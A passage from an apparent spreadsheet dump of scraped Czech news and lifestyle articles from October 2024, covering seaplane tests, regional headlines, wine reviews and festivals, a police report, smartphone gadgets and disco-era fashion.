dnes Ladislav Kuděj zkouší poprvé. Letadlo testují piloti ve výšce 200 metrů. Nejdůležitější je ale samotné přistání. -Myslím, že proběhlo hladce. -Při testech se zaměřují na pozici plováků, fungování vodních kormidel i těžiště celého letounu. -Tam je důležité, aby se letadlo ve vodě buď nenořilo, nebo naopak aby neskákalo jak žabka po vlnách. -Provoz hydroplánů je v Česku zakázaný. Nutné je proto speciální povolení. Podle plavební správy ho zatím dostaly hydroplány jen šestkrát, dvakrát na Orlíku a čtyřikrát v Hněvkovicích . -Jedná se o letadla, která jsou sice vyráběna v České republice , ale slouží na vývoz. To znamená, jde o to, abychom v ČR dokázali zachovat nějaký vývoj, výrobu. -Nemáme k dispozici vodní hladinu, na kterou bysme to spustili jinak než přistáním, takže je to vždycky velké překvapení, jak to dopadne. -Kolem poledne zkoušky skončily. Při 20. testovacím letu se část hydroplánu poškodila. Technici ho museli vytáhnout na břeh a zkontrolovat škody. -Všechna přistání a vzlety probíhaly standardně a v pohodě. Chtěli jsme zkusit letmé přistání, což je dotyk na vodu a start. Chytili jsme levým plovákem vlnu a stalo se to, co se stalo. -Poškozený je levý plovák, škoda za zhruba 50 tisíc korun. Na samotné zkoušky ale incident vliv neměl. -Zkoušky proběhly úspěšně, bylo zkontrolováno, že plováky jsou správně seřízeny. -S hydroplánem piloti odpoledne bezpečně přistáli na strakonickém letišti, kde teď plovák do měsíce opraví. To je vše, hezký večer. Bláža Stráníková a Tomáš Seidl</t>
  </si>
  <si>
    <t>350560</t>
  </si>
  <si>
    <t>20241001_68_2996378758_e8aacad59f92717b47bf.html</t>
  </si>
  <si>
    <t>e8aacad59f92717b47bf</t>
  </si>
  <si>
    <t>Události v regionech (jih a západ): 1. října</t>
  </si>
  <si>
    <t>Události v regionech (jih a západ): 1. října Na Sokolovsku se šíří žloutenka typu A — Výdejní boxy zásilkových služeb pod drobnohledem — Problémy s nelegálními billboardy nekončí — Kominíci stále chybí — Mokro komplikuje sklizeň brambor na Vysočině — Pivo už jen v zálohovaném skle — Města hledají strážníky, se střídavým úspěchem — Nové trolebusy v Jihlavě mají problémy — Výzkum mezi obyvateli z NP Šumava — Participativní rozpočet i pro 15leté — a Orlíku testovali nový hydroplán</t>
  </si>
  <si>
    <t>20241001_69_2996378721_d2837e15f68123b61ed3.html</t>
  </si>
  <si>
    <t>d2837e15f68123b61ed3</t>
  </si>
  <si>
    <t>Události v regionech (sever a východ): 1. října</t>
  </si>
  <si>
    <t>Události v regionech (sever a východ): 1. října Most rozšířil zákaz pití alkoholu na veřejnosti — Z pokut za rychlost Liberec nakoupí autobusy — Nová pobočka DDM v Ústí nad Labem — Cisterna žirečských hasičů slouží na Jičínsku — Žena vyšla na houby a ztratila se — Otevření části rekonstruované křižovatky — Dvě významné dopravní stavby na východě Čech — Spor o koupi zámku v Žitenicích — Nové očkovací centrum v severních Čechách — Podpis koaliční smlouvy v Pardubickém kraji — O koalici v Královéhradeckém kraji není jasno — Liberecký heliport mimo provoz kvůli stavbě — Babička roku 2024 Ústeckého kraje — Akce Spolky spolu v České Skalici — Obnova pardubického pietního místa na Zámečku — Puky pomáhají, podpora hokejovým klubům</t>
  </si>
  <si>
    <t>20241001_7_2998025398_bde2e66c383c3a27586f.html</t>
  </si>
  <si>
    <t>bde2e66c383c3a27586f</t>
  </si>
  <si>
    <t>Víno Ryzlink vlašský 2020, pozdní sběr, Vinařství Volařík</t>
  </si>
  <si>
    <t>Víno Ryzlink vlašský 2020, pozdní sběr, Vinařství Volařík /100 11. 2. 2024 „Čiré, průzračné víno , jantarově zlaté barvy, s oranžovými záblesky a velmi dobrou viskozitou. Bohaté, čistí, intenzivnější, mnohovrstevná, lákavá vůně kombinuje lehký nádech růžových květů, s ovocnými tóny zralých subtropických plodů, sušené grepové kůry i sušených meruněk, s nádechem propolisu a kořenitých tónů vanilky, hřebíčku a skořice. Harmonická, plná, oblá a hladká, vyzrálá a kořenitá, suchá chuť, osvěžena pomerančovou a grepovou kůrou, kandovanými citrusy a sušenými meruňkami, sladkým kořením, nádherně zapracovanou tříslovinou a šťavnatou kyselinkou, evokující citrusy a bílý rybíz..Dlouhý, příjemně kořenitý závěr, přecházející od rozkvetlé louky k ovocným tónům. Moje nejkrásnější oranžáda. Celé tři dny jsem ji blaženě vychutnával, ala pak nastal konec, láhev byla prázdná.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241001_70_2996239469_d37a9cb44f3658e3a1e9.html</t>
  </si>
  <si>
    <t>d37a9cb44f3658e3a1e9</t>
  </si>
  <si>
    <t>Valtice a sklenka vína či dýňové slavnosti. Kam vyrazit na podzimní výlety?</t>
  </si>
  <si>
    <t>Shrnutí Valtice a sklenka vína či dýňové slavnosti. Kam vyrazit na podzimní výlety? 1. října 2024 18:00 Vinobraní už je pomalu za námi a je čas na další speciální podzimní radovánky. Co takhle vyrazit na dýňobraní či podzimní slavnosti? Máme pro vás tipy na podzimní výlety za dýněmi, kam můžete vyrazit jak s dětmi, tak klidně i na rande či procházku. Další 3 fotografie v galerii Dýňobraní v Bohunicích bude probíhat na dvoře a v zahradě SVČ Lány. | foto: Lužánky Dýňový svět Na Vysočině ve vesničce Nová Ves u Leštiny je nenápadná zahrada a dvůr statku u Pipků. Každý podzim se promění v obrovský dýňový svět plný oranžových skvostů. Děti se zde mohou vyřádit na přírodním hřišti, navštívit zvířecí obyvatele statku a užít si tematické hry a dílny. Rodiče si mezitím užijí klidnou procházku mezi vyřezanými a nazdobenými dýněmi a možná ocení něco dobrého na zub. Pro malé nadšence jsou připraveny i traktorové projížďky a každý víkend probíhá dýňové vyřezávání. Dýňový svět je otevřen až do 3. listopadu a vstup stojí 150 korun. Dýňový svět na statku u Pipků nabízí nevšední zážitky. Podzimní slavnosti města Borovany Tuto sobotu začínají podzimní slavnosti města Borovany na Českobudějovicku. Nabídnou nejen dobroty z jablek, hrušek, švestek, cuket, dýní, brambor, zvěřiny, ryb a hub, ale i bohatý doprovodný program. Těšit se můžete na hudební vystoupení Cimbálové muziky Slovácko mladší i na francouzské šansony v netradičních úpravách, doplněné o autorskou tvorbu zpěvačky Zdenky Trvalcové s kapelou Voilá. Program doprovodí pohádky pro děti v podání Liduščina divadla nebo rozhovory například s držitelem zlatých medailí ze světových kuchařských olympiád v carvingu (nejde o lyžování, ale o techniku ozdobné řezby do zeleniny a ovoce – pozn. redakce). Program v Borovanech bude zpestřovat mykologická poradna s výstavou hub a mnoho dalšího. Valtické podzemí A co takhle vychutnat si podzim se sklenkou vína v ruce? Valtice v Jihomoravském kraji nabízejí kromě podzimní atmosféry a dýní také bohatý kulturní program. Budou se podávat speciality, víno poteče proudem a pro děti tu bude připraven speciální večerní program v halloweenském stylu. A až si užijete strašidelný večer v podzemí, čeká vás cimbálová muzika a víno . Akce se koná v pátek 25. října a v sobotu 26. října. Valtické podzemí nabízí akce celoročně. Dýňobraní v Bohunicích Ani v Brně si neodpustí dýňobraní. Na Lánech v Bohunicích se můžete těšit na celé odpoledne plné dlabání dýní, tematických soutěží a dýňových specialit. Každý účastník si bude moci vytvořit vlastní dýni, kterou si samozřejmě odnese domů – a ještě k tomu dostanete i minikuchařku plnou dýňových receptů. Pro malé tvořílky i větší děti budou připravené soutěže, podzimní dekorace a také halloweenský fotokoutek, aby si děti zážitky rovnou zvěčnily. Akce se uskuteční 19. října a vstup bude pro tvořivé účastníky stát 250 korun. Je nutné se přihlásit předem, kvůli dostatku materiálu. Dýňobraní v Bohunicích bude probíhat na dvoře a v zahradě SVČ Lány. Autor: Tereza Šimurdová Autor person Tereza Šimurdová Rubrika transition_slide Metro - Společnost</t>
  </si>
  <si>
    <t>7140</t>
  </si>
  <si>
    <t>17020</t>
  </si>
  <si>
    <t>20241001_71_2996225520_615b13fd2c369d55b59c.html</t>
  </si>
  <si>
    <t>615b13fd2c369d55b59c</t>
  </si>
  <si>
    <t>Festival otevřených sklepů – Jaro v Modrých horách</t>
  </si>
  <si>
    <t>Festival otevřených sklepů – Jaro v Modrých horách Modré Hory – pět obcí, jako pět prstů mozolnaté dlaně. Tady bude 35. Festival otevřených sklepů a že to nebude jen o vínech, garantuje místní chasa. Tak se těšme na to všechno, na vína tradiční i moderní, na krásu Modrých Hor a umění zdejších vinařů. Modré Hory – pět obcí, jako pět prstů mozolnaté dlaně; Modré hory – kraj kudy prošel Pán Bůh a požehnal úrodné zemi. Kraj André – odrůdy modrých hroznů, vyšlechtěné právě tady a oblast Vína v oranžovém – to podle místních meruněk, které obklopují vinice. To vše o Modrých Horách platí. A že 35. festival nebude jen o vínech, garantuje místní chasa, vždyť hody se tady slaví nejméně tři dny, v krojích a s úctou ke všem tradicím. K prvnímu VOC Modré Hory už přibylo i VOC Kraví Hora s jedinou hodnocenou odrůdou André, vyrostla nová vinařství, více se experimentuje, ale více se ctí i klasická vína . Tak se těšme na to všechno, na vína tradiční i moderní, na krásu Modrých Hor a umění zdejších vinařů. V ceně dvoudenní vstupenky je vstup do všech sklepů s degustaci nejméně 300 festivalových vín, tištěný průvodce i festivalová aplikace, degustační sklenička, stylová textilní taška a neomezené jízdy festivalovými autobusy. Začátek je v sobotu 26. dubna ve Velkých Pavlovicích , sklepy se otevřou od 10 do 21 hodin, v neděli pak od 10 do 15 hodin. Po oba dva dny je i výhodný nákup vín přímo u vinařů. Registrační místo s prodejem vstupenek na místě je ve Velkých Pavlovicích otevřeno v pátek 25. dubna od 15 do 20 hodin, v sobotu od 8 do 15 hodin a v neděli od 10 do 12 hodin. Kyvadlová doprava jezdí mezi obcemi po celou dobu akce. Předprodej vstupenek bude probíhat ve 3. vlnách až do 24. dubna na stránkách festivalu. Počasí: dnes 16 °C Rychlost větru: 6 m/s Oblačnost: 98 % Tlak: 1005 hPa Vlhkost: 73 % Rychlost větru: 6 m/s Oblačnost: 90 % Tlak: 997 hPa Vlhkost: 65 % Rychlost větru: 2 m/s Oblačnost: 85 % Tlak: 1013 hPa Vlhkost: 67 % Rychlost větru: 2 m/s Oblačnost: 38 % Tlak: 1022 hPa Vlhkost: 57 % Rychlost větru: 6 m/s Oblačnost: 100 % Tlak: 1010 hPa Vlhkost: 78 % Rychlost větru: 6 m/s Oblačnost: 5 % Tlak: 1024 hPa Vlhkost: 59 % Rychlost větru: 2 m/s Tlak: 1025 hPa Vlhkost: 54 % Rychlost větru: 3 m/s Tlak: 1024 hPa Vlhkost: 56 % &amp;lt; &amp;gt;</t>
  </si>
  <si>
    <t>75260</t>
  </si>
  <si>
    <t>80020</t>
  </si>
  <si>
    <t>20241001_72_2996346395_4878e3fccbde8f0d7216.html</t>
  </si>
  <si>
    <t>4878e3fccbde8f0d7216</t>
  </si>
  <si>
    <t>Silně opilý muž spadl v Náměšti z kola a zůstal ležet v příkopu. Měl tři promile</t>
  </si>
  <si>
    <t>Silně opilý muž spadl v Náměšti z kola a zůstal ležet v příkopu. Měl tři promile Na opilého muže ležícího v příkopu v ulici U Pivovaru v Náměšti nad Oslavou upozornili lidé policisty v neděli po jedenácté hodině dopoledne. Blízko něj leželo i jeho jízdní kolo. „Jednalo se o osmašedesátiletého muže. Nebyl schopen samostatné chůze, byl také drobně poraněný zřejmě po pádu,“ popsala policejní mluvčí Jana Kroutilová . Krimi Při dechové zkoušce mu policisté naměřili 2,99 promile alkoholu . Opakovaná zkouška dokonce ukázala hodnotu přes tři promile. Policisté přivolali zdravotníky zdravotníky, kteří muže převezli na vyšetření do třebíčské nemocnice. Autor: František Vondrák Autor František Vondrák Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>6610</t>
  </si>
  <si>
    <t>2380</t>
  </si>
  <si>
    <t>20241001_73_2996273737_738acc12da5071737b33.html</t>
  </si>
  <si>
    <t>738acc12da5071737b33</t>
  </si>
  <si>
    <t>8 kuriózních gadgetů, které lze propojit s chytrým telefonem. Alkoholtester, sonar, hlídač vajec...</t>
  </si>
  <si>
    <t>8 kuriózních gadgetů, které lze propojit s chytrým telefonem. Alkoholtester, sonar, hlídač vajec... Smartphony jsou dostatečně všestranná zařízení Co ale nezvládnou samy, mohou udělat prostřednictvím příslušenství Vybrali jsme nejkurióznější gadgety, které můžete spojit s mobilem 1 e 3 4 5 6 7 8 Ukázat všechny listy najednou To, že lze k chytrému telefonu připojit hodinky, fitness náramky, ledničku, automatickou pračku či další spotřebiče chytré domácnosti, dnes už patrně nikoho nepřekvapí. Považujeme to za samozřejmost. S mobilem lze ale propojit i různé neobvyklé gadgety, o jejichž existenci jste dosud možná neměli ponětí. Tady je výběr těch nejkurióznějších. Sonar pro rybáře Sonar Deeper Pro Plus 2 je skvělý nástroj pro každého rybáře, který chce získat co nejvíce informací o dění pod hladinou. Tento gadget nabízí bezdrátové připojení, což umožňuje jeho použití jak ze břehu, tak i z lodi, mola nebo nábřeží. V aplikaci Fish Deeper se rybářům otevírá široká škála funkcí, včetně označení míst vhodných pro rybolov pomocí GPS nebo sledování detailního obrazu pod hladinou. Sonar pro rybáře Propojení sonaru s chytrým telefonem přináší řadu výhod – uživatelé mohou vidět obraz dna, vegetace a samozřejmě i ryb až do hloubky 100 metrů, což výrazně zlepšuje efektivitu rybolovu. Díky třem frekvencím paprsku dokáže rozlišit různé velikosti ryb a přesně určit jejich polohu. V aplikaci lze ukládat úlovky, zaznamenávat důležité informace o technikách a návnadách a také vytvářet osobní rybářské deníky, což usnadňuje plánování budoucích výprav. Další výhodou tohoto zařízení je tvorba detailních map terénu. Rybáři mohou v aplikaci Fish Deeper zobrazit 2D a 3D mapy dna, které jsou neustále aktualizovány díky komunitě přispěvatelů. Díky tomu se mohou lépe orientovat v neznámých vodách, najít skryté rybářské lokality a naplánovat si trasu. Stránka produktu: deepersonar.com . Ovládání papírové vlaštovky PowerUp 4.0 je gadget, který přemění obyčejné papírové letadélko v plně ovladatelný dron řízený prostřednictvím chytrého telefonu. Tento model je vybaven dvojicí motorů, které umožňují ovládat vlaštovku přes Bluetooth připojení. Stačí si stáhnout aplikaci PowerUp 4.0 na iOS nebo Android a můžete začít provádět různé letecké manévry, jako jsou přemety nebo otočky. Aplikace poskytuje průběžně aktualizované informace o směru letu, síle tahu a dalších letových údajích. Ovládání papírové vlaštovky Propojení s chytrým telefonem poskytuje přesnou kontrolu nad vlaštovkou a díky integrovanému autopilotovi a gyroskopickému stabilizátoru se minimalizují chyby v průběhu letu, a to i ve zhoršených povětrnostních podmínkách. To znamená, že pilotáž může snadno zvládnout i méně zkušený uživatel. Další výhodou je poměrně rychlé nabíjení – za 30 minut na nabíječce získáte až 10 minut letu. PowerUp 4.0 je navíc konstruován tak, aby byl odolný vůči nárazům díky karbonovému tělu a nylonem vyztužené přední části. Díky tomu gadget ustojí i pády a nárazy. Jde o záležitost vhodnou pro malé děti, tak pro dospělé, kteří chtějí zábavnou formou objevovat základy aerodynamiky. Stránka produktu: poweruptoys.com . Autíčko na dálkové ovládání s kamerou DEERC RC Cars DE36W je autíčko na dálkové ovládání, které přináší zábavu dětem i dospělým díky kombinaci vysoké rychlosti, off-road schopností a moderním technologiím. Vozidlo je vybaveno kamerou s rozlišením 1080p a Wi-Fi připojením, díky čemuž se na telefonu můžete dívat na jízdu z pohledu řidiče. Pomocí mobilní aplikace lze sledovat přímý přenos a upravovat úhel pohledu kamery, abyste zachytili ty nejlepší záběry. Autíčko na dálkové ovládání s kamerou Kromě klasického 2,4GHz rádiového ovládání, které má dosah až 50 metrů, je možné auto ovládat také přes mobilní aplikaci s dosahem 30 metrů. Aplikace kromě toho umožňuje sdílení natočených videí a pořízených fotografií na sociálních sítích. K ovládání přes mobilní aplikaci je využíván gyroskop, takže směr jízdy lze určovat nakláněním telefonu. S dvěma výkonnými motory a dobíjecími bateriemi dosahuje auto rychlosti až 20 km/h a na jedno nabití nabízí dobu jízdy až 60 minut. Díky protiskluzovým pneumatikám, silným tlumičům a odolné konstrukci zvládne DEERC RC Car DE36W i jízdu v obtížném terénu, jako je písek, bláto či nerovné cesty. Stránka produktu: store.deerc.com . Chytrá láhev pro správný pitný režim Chytrá láhev Equa Smart je moderní nástroj pro sledování pitného režimu, který vám pomůže udržet vaše tělo hydratované po celý den. Aplikací pro smartphony s operačními systémy iOS a Android doporučuje denní příjem tekutin na základě vašich tělesných údajů. Když je čas na doplnění tekutin, láhev vás jemně upozorní pomocí LED na spodní části. Díky tomu si nemusíte dělat starosti s pravidelným pitím, láhev vám sama naznačí, kdy je potřeba se napít. Chytrá láhev pro správný pitný režim Jednou z hlavních výhod chytré láhve Equa Smart je propojení s mobilní aplikací realizované přes Bluetooth. Aplikace vám pomůže sledovat vaši hydrataci a udržet si přehled o tom, kolik tekutin jste již během dne vypili. Aplikace také zaznamenává historii pití a nabízí nastavení notifikací. Pro rychlé zjištění, zda je třeba se napít, také stačí jemně poklepat na láhev – jedno rozsvícení LED znamená, že jste na správné cestě, zatímco tři bliknutí signalizují, že je čas doplnit tekutiny. Láhev Equa Smart je vyrobena z kvalitní nerezové oceli s dvojitou stěnou, která udrží nápoje až 24 hodin studené nebo 12 hodin teplé. Láhev je nejen funkční, ale také stylová, s matnou povrchovou úpravou a praktickým poutkem pro pohodlné přenášení. S kapacitou 680 mililitrů a výdrží baterie až 6 měsíců je skvělým doplňkem pro každodenní použití, ať už doma, v práci nebo na cestách. Stránka produktu: mojeequa.cz . Chytré brýle Chytré brýle Ray-Ban Meta druhé generace jsou ideálním společníkem pro každodenní nošení. Díky technologii Meta umožňují uživatelům prožívat digitální svět jinak. Kombinují ikonický styl Ray-Ban s inovativními funkcemi, které umožňují fotografování, natáčení videí a živé streamování na sociální sítě, jako jsou Facebook a Instagram. Jsou tak šikovným doplňkem pro všechny, kteří chtějí sdílet své zážitky okamžitě a v reálném čase. Chytré brýle Hlavní výhodou brýlí je, že můžete mít mnoho funkcí chytrého telefonu vždy po ruce, aniž byste museli vytahovat mobil z kapsy. Brýle disponují integrovanými reproduktory, mikrofony a kamerou, které jsou synchronizovány s telefonem. To umožňuje pohodlné telefonování, poslech hudby nebo příjem zpráv. Další funkcí je možnost ovládání hlasem pomocí pokročilého asistenta Meta AI, kterému lze klást otázky nebo zadávat úkoly, aniž by bylo nutné použít ruce. Propojení s telefonem výrazně rozšiřuje možnosti zpracování a sdílení obsahu. Uživatelé mohou pomocí aplikace Meta View snadno importovat své fotografie a videa do telefonu, kde je mohou dále editovat a sdílet. Díky dlouhé výdrži baterie, která s plně nabitým pouzdrem činí až 36 hodin, budou tyto funkce dostupné i při delším cestování či aktivním dni. Stránka produktu: ray-ban.com . Alkohol tester BACtrack breathalyzer je nástroj, který umožňuje rychlé a přesné měření obsahu alkoholu v dechu. Přístroj je vhodný pro osobní i profesionální použití a díky malým rozměrům se snadno přenáší. Použitá technologie senzorů zaručuje přesné výsledky. Díky jednoduché obsluze pomocí jednoho tlačítka lze okamžitě získat informaci o hladině a předejít tak nebezpečným situacím, jako je například řízení pod vlivem. Alkohol tester Díky bezdrátové synchronizaci s mobilní aplikací lze automaticky zaznamenávat výsledky měření a sledovat podrobné analýzy o tom, jak organismus zpracovává alkohol v průběhu času. Z aplikaci je možné vyčíst nejen aktuální hladinu alkoholu , ale i předpovědi, kdy hladina klesne na úroveň bezpečnou pro řízení. To pomáhá uživatelům lépe plánovat své večery a zlepšuje povědomí o tom, jak rychle jejich tělo metabolizuje alkohol . Z aplikace lze sdílet výsledky měření s rodinou nebo přáteli, což může být užitečné v situacích, kdy je třeba zajistit bezpečnost při skupinových oslavách. Poskytuje přehledné a intuitivní rozhraní, které usnadňuje správu a archivaci výsledků z jednotlivých měření. Stránka produktu: bactrack.solutions . Termokamera FLIR One je malá termokamera, která se připojuje k chytrému telefonu a pomáhá detekovat rozdíly teplot v různých prostředích. Díky tomu lze snadno identifikovat problémy s izolací, úniky tepla nebo vody, což je ideální pro domácí inspekce a údržbu. Kameru lze využít k detekci tepelných ztrát kolem oken a dveří, vadných spotřebičů, či skrytých problémů, jako jsou úniky v potrubí nebo přítomnost škůdců v domě. FLIR One je k dispozici pro zařízení s konektory USB-C i Lightning. Termokamera Aplikace FLIR ONE umožňuje ukládání snímků, jejich analýzu a případně i sdílení. Díky pokročilé technologii MSX (Multi-Spectral Dynamic Imaging) poskytuje kamera detailní snímky, ve kterých jsou údaje o teplotě kombinovány s vizuálními detaily, což usnadňuje přesnější identifikaci problémových oblastí. Aplikace také nabízí užitečné návody, které uživatele provedou krok za krokem různými typy inspekcí. Propojení FLIR One s chytrým telefonem zvyšuje efektivitu práce a zajišťuje snadný přístup k výsledkům a jejich archivaci. Snímky lze nahrát na cloudovou službu FLIR Ignite, odkud mohou být sdíleny s kolegy nebo klienty. To je může být užitečné pro profesionály, kteří provádějí inspekce a chtějí přímo v terénu vytvářet přehledné a detailní reporty. Stránka produktu: flir.eu . Hlídač vajec Quirky Egg Minder je netradičních zařízení, které umožňuje sledovat počet vajec v lednici a upozorňuje na jejich blížící se datum spotřeby. Chytrý držák na vejce je vybaven senzory, které detekují, zda je v každém z jeho 14 slotů vejce, a pomocí aplikace propojené s chytrým telefonem uživatele informuje o jejich stavu. Kromě toho LED indikují, které vejce je nejstarší, takže je snadné jej spotřebovat jako první. Hlídač vajec Připojení Egg Minderu k chytrému telefonu přináší užitečné funkce, jako je upozornění na nízký počet vajec nebo sledování jejich stáří přímo v aplikaci. Díky tomu budete mít permanentní přehled o počtu i stavu vajec, která uchováváte v lednici, což oceníte například při plánování nákupů. Další výhodou Egg Minderu je jeho schopnost předejít plýtvání potravinami a zvýšit efektivitu nakupování. Díky přesné evidenci počtu vajec a jejich stáří nemusíte odhadovat ani pracně vzpomínat, kolik vajec máte doma, a vyhnete se tak zbytečnému nákupu dalších, pokud je ještě nepotřebujete. Stránka produktu: amazon.com . 1 e 3 4 5 6 7 8 Nastavte si přezdívku Potvrďte prosím přezdívku, kterou jsme náhodně vygenerovali, nebo si zvolte jinou. Zajistí, že váš profil bude unikátní. Tato přezdívka je už obsazená, zvolte prosím jinou. Potvrdit přezdívku Autor: Karel Kilián Autor Karel Kilián</t>
  </si>
  <si>
    <t>23110</t>
  </si>
  <si>
    <t>20241001_74_2996656368_28e192af73638be51c15.html</t>
  </si>
  <si>
    <t>28e192af73638be51c15</t>
  </si>
  <si>
    <t>70. léta módy: Disco styl, který se vrací</t>
  </si>
  <si>
    <t>70. léta módy: Disco styl, který se vrací léta módy, především v podobě disco stylu, se opět dostávají do popředí dnešního fashion světa a nezapomínají na svou nezapomenutelnou energii a barevnost. Stejně jako v dobách, kdy taneční parkety pulsovaly rytmy disco, i dnes mnozí stylisté čerpají inspiraci z tohoto období, aby oživili naše šatníky. V tomto článku vás provedeme fascinujícím návratem disco stylu, ukážeme vám, jak ho začlenit do vašeho každodenního outfitu a proč byste si měli letos pořídit kousky, které oslní. Připravte se, ponořte se do světa, kde se móda setkává s hudbou a společenským životem, a objevte, jak můžete snadno osvěžit svůj styl s nádechem nostalgie. Obsah článku Disco styl a jeho vliv na dnešní módu Klíčové prvky disco estetiky Jak začlenit disco prvky do šatníku Inspirovaní ikonami disco kultury Tipy na stylové outfity pro každou příležitost Příslušenství, které dodá šmrnc Disco styl a udržitelnost módy Jak se disco styl projevuje v populární kultuře Osvojte si disco styl pro moderní den Otázky &amp;amp; Odpovědi Závěrečné myšlenky Nenechte si ujít: Disco styl a jeho vliv na dnešní módu Disco styl, který se ve 70. letech vyznačoval oslnivými barvami, třpytivými látkami a nezaměnitelnými siluetami, se dnes znovu dostává do popředí. Stačí se podívat na módní přehlídky a street style, abychom zjistili, že prvky disco módy se vrací jako bumerang, a to nejen na taneční parkety. Jakých kousků si tedy v aktuální módě všímat? Látky s leskem: Saténové haleny a metalické sukně, které odrážejí světlo, jsou opět v kurzu. Výrazné vzory: Agresivní geometrické tvary nebo květinové potisky oživují naše šatníky. Platformy a vysoké podpatky: Tyto boty dodávají nejen výšku, ale i sebevědomí, což je přesně to, co na večer potřebuji! Mezi ikony disco stylu patří jména jako Donna Summer nebo John Travolta , jejichž módní volby dodnes inspirují návrháře. V současnosti dokonce existuje celá řada influencerů , kteří zasvěcují své profily retro vzhledům, čímž ukazují, jak hravé a experimentální může být oživení těchto trendů. Chcete-li vědět, co nosit, sledujte trendy z minulého století, ale nebojte se přidat i moderní twist! Disco prvek Moderní ekvivalent Široké kalhoty Kalhoty s vysokým pasem Třpytivý top Vesty s flitry Kukla s náušnicemi Velké kruhové náušnice Je fascinující, jak se móda opakuje a transformuje, a disco styl není žádnou výjimkou. Pokud patříte mezi ty, kteří se rádi oblékají podle aktuálních trendů, neváhejte a voďte si kousek disco atmosféry do své šatny. Protože kdo by se nechtěl cítit jako hvězda na tanečním parketu, i když jen na cestě do supermarketu? Klíčové prvky disco estetiky Disco estetika je jedno z nejvýraznějších témat 70. let, které kombinuje hudbu, tanec a módu v jedinečnou symbiózu. V srdci tohoto stylu leží životní radost a svoboda , co se projevuje jak v oblečení, tak v osobním vyjadřování. Hlavními prvky tohoto stylu jsou: Lesklé materiály: Samet, metalické tkaniny a polyester se staly nezbytností. Tyto látky nejen dodávaly vzhledu hloubku, ale také odrážely světlo na tanečním parketu. Volné siluety: Oblečení často zahrnovalo široké kalhoty a dlouhé, volné blůzky. Díky tomu se lidé mohli snadno pohybovat a tancovat. Živé barvy: Pastelové i neonové barvy byly v módě. Kombinace různých odstínů vytvořila mnohovrstevnatý, hravý vzhled. Nezapomenutelné doplňky: Velké náušnice, chunky náramky a klobouky různých tvarů dodávaly outfitům šmrnc a osobitost. V rámci disco estetiky nelze opomenout ani významnou roli make-upu a účesů . Glitter, pastelové oční stíny, a výrazně zvýrazněné rty se staly téměř povinným vybavením každé disco fanoušky. Účesy se pohybovaly od excentrických afro účesů po hladké, bouffant style – čím extravagantnější, tím lépe! Prvek Příklady Materiály Polyester, samet Silueta Wide leg kalhoty, maxi šaty Barvy Neonové, pastelové Doplňky Velké náušnice, klobouky Když si představíte disco estetiku, nezapomeňte, že jde o více než jen o módu; je to celkový životní styl , který oslavuje individualitu a sebevyjádření. A kdo by si nechtěl obléci něco, co mu umožní roztancovat se pod světly reflektorů a cítit se jako hvězda? Uvolněte se, zapněte pravý beat a nechte se inspirovat módou, která se nikdy opravdu nevytratila. Jak začlenit disco prvky do šatníku Disco prvky mohou být skvělým způsobem, jak oživit váš šatník a vnést do něj trochu radosti a extravagance. Nejde jen o lesklé látky a výrazné barvy; klíčem je umění kombinovat různé prvky, které dodají vašim outfitům šmrnc. Například, metalické materiály jako zlato nebo stříbro mohou mít překvapivě sofistikovaný vzhled, když je zkombinujete s jednoduchými kousky. Což takhle začít s metalickou sukní a doplnit ji bílou halenkou? To máte ten pravý concoction, který vám přichystá pozornost na každém kroku! Dalším zásadním prvkem jsou vzorované legíny nebo kalhoty s širokými nohavicemi . Tyto kousky nejenže vypadají fantasticky, ale jsou také velmi pohodlné. Vzpomeňte na legendární disco divu Dianu Ross a zkuste si představit, jak byste se v takových kalhotách cítili na tanečním parketu. Klidně se vydejte do second handu, kde můžete najít autentické kousky z 70. let, které dodají vašemu stylu originiálnost a hodnotu. Obyčejné kousky tak ožijí zlatým dotekem minulosti. Jedním z nejlepších způsobů, jak integrovat disco prvky do vašeho šatníku, je zaměřit se na doplnění stávajících outfitů. Přidejte úzké brýle nebo výrazné náušnice, které vás snadno přenesou do atmosféry disco klubů. Dále nezapomeňte na boty! Platformy nebo sandály s vysokým podpatkem skvěle doladí váš styl a budou se hodit k většině příležitostí. Kromě toho si můžete pořídit i stříbrnou pásku , která dodá vašemu vzhledu potřebnou jiskru. Nezapomínejte na barvy! Disco styl je o odvážných volbách, takže nebojte se experimentovat s i neonovými odstíny. To, co je klíčové, je rovnováha mezi třpytivým a jednoduchým. Pokud si vezmete něco výrazného, zkombinujte to s něčím neutrálním, abyste předešli módnímu přeplácání. A mějte na paměti – uplé a lesklé nemusí nutně znamenat nevhodné; pokud se v tom cítíte dobře, nechte své já rozkvést! Inspirovaní ikonami disco kultury Disco kultura 70. let přinesla do světa módy revoluci plnou barev a extravagantních stylů. Tato doba byla známa nejen hudbou, ale také specifickým způsobem oblékání, který dodnes inspiruje módní návrháře a milovníky stylu. Klíčové prvky, které definovaly disco módu, zahrnovaly: Metalické látky : Lesklé materiály, které odrážely světla diskoték, byly nezbytností pro každého, kdo chtěl vyniknout na parketu. Jasné barvy : Odtíny jako electric blue, neon pink a lime green dominovaly jak večerním šatům, tak i pánským oblekům. Vypasované siluety : Kalhoty s vysokým pasem a výrazně tvarované topy zvýraznily křivky a byly ideální pro taneční pohyby. Ozdoby a doplňky : Velké náušnice, šperky a široké opasky dodávaly outfitům extra šmrnc. Způsob, jakým se disco styl propojoval s osobním projevem, byl fascinující. Mnohdy sloužil jako forma sebevyjádření; lidé si na sebe brali to, co bylo odvážné, co z nich dělalo hvězdy. Jako malý kluk jsem obdivoval starší kluky z ulice, jak se pyšnili svými flitrovými košilemi a trychtýřovými kalhotami. Sledování jejich tanečních kreací na parketu bylo jako sledování filmového představení plného emocí a radosti. V současnosti se diskotékový styl opět vrací do módy, včetně reinterpretací jeho klasických prvků. S moderníma twistama se setkáváme nejen ve fashion shopech, ale i na různých událostech, jako jsou tematické večírky či festivaly. Mnozí návrháři se nyní snaží vrátit k těmto ikonickým stylům, ale s udržitelným přístupem a použitím ekologických materiálů. To, co dříve bylo pomíjivé, může nyní dostat nový život. Takže pokud se rozhodnete obléknout se ve stylu disco, nezapomeňte dodat svůj osobní šmrnc – to je to, co dělá každého jedinečným! Tipy na stylové outfity pro každou příležitost Jestliže se chystáte na disco večírek, zaručeně se vám vyplatí vsaďte na lesklé materiály a výrazné barvy. Oversized košile s batikovaným vzorem nebo těsné kalhoty se rozšiřujícími se nohavicemi jsou stěžejními prvky pro vaši stylizaci. Nebojte se přidat i nějaký ten třpyt, 